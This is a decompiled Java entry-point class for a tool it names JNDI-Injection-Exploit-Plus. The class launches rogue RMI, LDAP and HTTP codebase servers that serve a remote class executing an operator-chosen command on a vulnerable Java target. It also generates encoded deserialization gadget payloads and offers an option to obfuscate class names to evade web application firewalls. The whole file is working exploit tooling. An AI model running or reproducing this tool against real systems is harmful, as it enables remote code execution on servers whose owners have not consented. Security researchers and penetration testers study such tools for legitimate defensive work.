/*
 * Decompiled with CFR 0.152.
 */
package run;

import common.Strings;
import java.net.Inet4Address;
import java.net.InetAddress;
import java.net.InterfaceAddress;
import java.net.NetworkInterface;
import java.net.URL;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Base64;
import java.util.Collections;
import java.util.Date;
import java.util.Enumeration;
import java.util.LinkedList;
import java.util.List;
import jetty.JettyServer;
import jndi.CommonDeserial;
import jndi.LDAPRefServer;
import jndi.RMIRefServer;
import org.apache.commons.cli.CommandLine;
import org.apache.commons.cli.DefaultParser;
import org.apache.commons.cli.HelpFormatter;
import org.apache.commons.cli.Option;
import org.apache.commons.cli.Options;
import org.apache.commons.codec.binary.Hex;
import org.apache.commons.lang3.StringUtils;
import payloads.ObjectPayload;
import payloads.annotation.Authors;
import payloads.annotation.Dependencies;

public class ServerStart {
    public static String addr = ServerStart.getLocalIpByNetcard();
    public static int rmiPort = 43069;
    public static int ldapPort = 44069;
    private static int jettyPort = 45069;
    private URL codebase;
    private JettyServer jettyServer;
    private RMIRefServer rmiRefServer;
    private LDAPRefServer ldapRefServer;

    public static void main(String[] args) throws Exception {
        DefaultParser parser = new DefaultParser();
        CommandLine cmd = null;
        Options opts = null;
        Object[] cmdArray = new String[]{"open", "/Applications/Calculator.app"};
        String deserial = "";
        String wrapper = null;
        String deserialOutput = "base64";
        Boolean fusion = false;
        try {
            opts = ServerStart.cmdlineOptions();
            cmd = parser.parse(opts, args);
        }
        catch (Exception e) {
            System.err.println("Cmdlines parse failed.");
            ServerStart.printBasicUsage(opts);
            System.exit(1);
        }
        if (cmd.hasOption("help")) {
            ServerStart.printBasicUsage(opts);
            return;
        }
        if (cmd.hasOption("C")) {
            cmdArray = cmd.getOptionValues('C');
        }
        if (cmd.hasOption("A")) {
            addr = cmd.getOptionValue('A');
        }
        if (cmd.hasOption("D")) {
            deserial = cmd.getOptionValue('D');
        }
        if (cmd.hasOption("W")) {
            wrapper = cmd.getOptionValue('W');
        }
        if (cmd.hasOption("O") && !(deserialOutput = cmd.getOptionValue('O')).equals("base64") && !deserialOutput.equals("hex")) {
            System.out.println("Error in param -O, you can only select base64 / hex");
            return;
        }
        if (cmd.hasOption("F")) {
            fusion = true;
        }
        if (deserial.length() == 0) {
            ServerStart servers = new ServerStart(new URL("http://" + addr + ":" + jettyPort + "/"), StringUtils.join((Object[])cmdArray, (String)" "));
            System.out.println("[rmiADDRESS] >> rmi://" + addr + ":" + rmiPort);
            System.out.println("[ldapADDRESS] >> ldap://" + addr + ":" + ldapPort);
            System.out.println("[COMMAND] >> " + ServerStart.withColor(StringUtils.join((Object[])cmdArray, (String)" "), "\u001b[34m"));
            Class.forName("util.Mapper");
            System.out.println("----------------------------Server Log----------------------------");
            System.out.println(ServerStart.getLocalTime() + " [JETTYSERVER]>> Listening on 0.0.0.0:" + jettyPort);
            Thread threadJetty = new Thread(servers.jettyServer);
            threadJetty.start();
            System.out.println(ServerStart.getLocalTime() + " [RMISERVER]  >> Listening on 0.0.0.0:" + rmiPort);
            Thread threadRMI = new Thread(servers.rmiRefServer);
            threadRMI.start();
            Thread threadLDAP = new Thread(servers.ldapRefServer);
            threadLDAP.start();
        } else {
            String cmdStr = String.join((CharSequence)" ", (CharSequence[])cmdArray);
            CommonDeserial commonDeserial = new CommonDeserial(cmdStr);
            byte[] deserialBytes = commonDeserial.execByDeserialize(deserial, wrapper, fusion);
            if (deserialBytes.length == 0) {
                System.out.println("Error in Deserialization, Please use the correct payload name.");
                ServerStart.printDeserialUsage();
                return;
            }
            if (deserialOutput.equals("base64")) {
                System.out.print(Base64.getEncoder().encodeToString(deserialBytes));
            } else if (deserialOutput.equals("hex")) {
                System.out.print(Hex.encodeHexString((byte[])deserialBytes));
            } else {
                System.out.println("Error in param -O, you can only select bin / base64 / hex");
            }
        }
    }

    public ServerStart(String cmd) throws Exception {
        this.codebase = new URL("http://" + ServerStart.getLocalIpByNetcard() + ":" + jettyPort + "/");
        this.jettyServer = new JettyServer(jettyPort, this.codebase, cmd);
        this.rmiRefServer = new RMIRefServer(rmiPort, this.codebase, cmd);
        this.ldapRefServer = new LDAPRefServer(ldapPort, this.codebase, cmd);
    }

    public ServerStart(URL codebase, String cmd) throws Exception {
        this.codebase = codebase;
        this.jettyServer = new JettyServer(jettyPort, this.codebase, cmd);
        this.rmiRefServer = new RMIRefServer(rmiPort, this.codebase, cmd);
        this.ldapRefServer = new LDAPRefServer(ldapPort, this.codebase, cmd);
    }

    public static Options cmdlineOptions() {
        Options opts = new Options();
        Option help = new Option("help", false, "Show the help info.");
        opts.addOption(help);
        Option c = new Option("C", true, "The command executed in remote .class.");
        c.setArgs(-2);
        opts.addOption(c);
        Option addr = new Option("A", true, "The address of server(ip or domain).");
        opts.addOption(addr);
        Option deserial = new Option("D", true, "The deserial payload name");
        opts.addOption(deserial);
        Option wrapper = new Option("W", true, "The wrapper name");
        opts.addOption(wrapper);
        Option deserialOutput = new Option("O", true, "The deserial output type, default is bin");
        opts.addOption(deserialOutput);
        Option fusion = new Option("F", false, "Fusion the Class Name to bypass WAF, default is false");
        opts.addOption(fusion);
        return opts;
    }

    public static String getLocalIpByNetcard() {
        try {
            Enumeration<NetworkInterface> e = NetworkInterface.getNetworkInterfaces();
            while (e.hasMoreElements()) {
                NetworkInterface item = e.nextElement();
                for (InterfaceAddress address : item.getInterfaceAddresses()) {
                    if (item.isLoopback() || !item.isUp() || !(address.getAddress() instanceof Inet4Address)) continue;
                    Inet4Address inet4Address = (Inet4Address)address.getAddress();
                    return inet4Address.getHostAddress();
                }
            }
            return InetAddress.getLocalHost().getHostAddress();
        }
        catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    public static String getLocalTime() {
        Date d = new Date();
        SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        return sdf.format(d);
    }

    public static Boolean isLinux() {
        return !System.getProperty("os.name").toLowerCase().startsWith("win");
    }

    public static String withColor(String str, String color) {
        if (ServerStart.isLinux().booleanValue()) {
            return color + str + "\u001b[0m";
        }
        return str;
    }

    private static void printBasicUsage(Options opts) {
        System.out.println();
        HelpFormatter formatter = new HelpFormatter();
        formatter.printHelp("Have fun with JNDI-Injection-Exploit-Plus", opts);
        System.out.println();
        ServerStart.printDeserialUsage();
    }

    private static void printDeserialUsage() {
        System.out.println();
        System.out.println("JNDI-Injection-Exploit-Plus Available Deserialization Payloads:");
        ArrayList<Class<? extends ObjectPayload>> payloadClasses = new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
        Collections.sort(payloadClasses, new Strings.ToStringComparator());
        LinkedList<String[]> rows = new LinkedList<String[]>();
        rows.add(new String[]{"Payload", "Authors", "Dependencies"});
        rows.add(new String[]{"-------", "-------", "------------"});
        for (Class clazz : payloadClasses) {
            rows.add(new String[]{clazz.getSimpleName(), Strings.join(Arrays.asList(Authors.Utils.getAuthors(clazz)), ", ", "@", ""), Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(clazz)), ", ", "", "")});
        }
        List<String> lines = Strings.formatTable(rows);
        for (String line : lines) {
            System.err.println("     " + line);
        }
    }
}

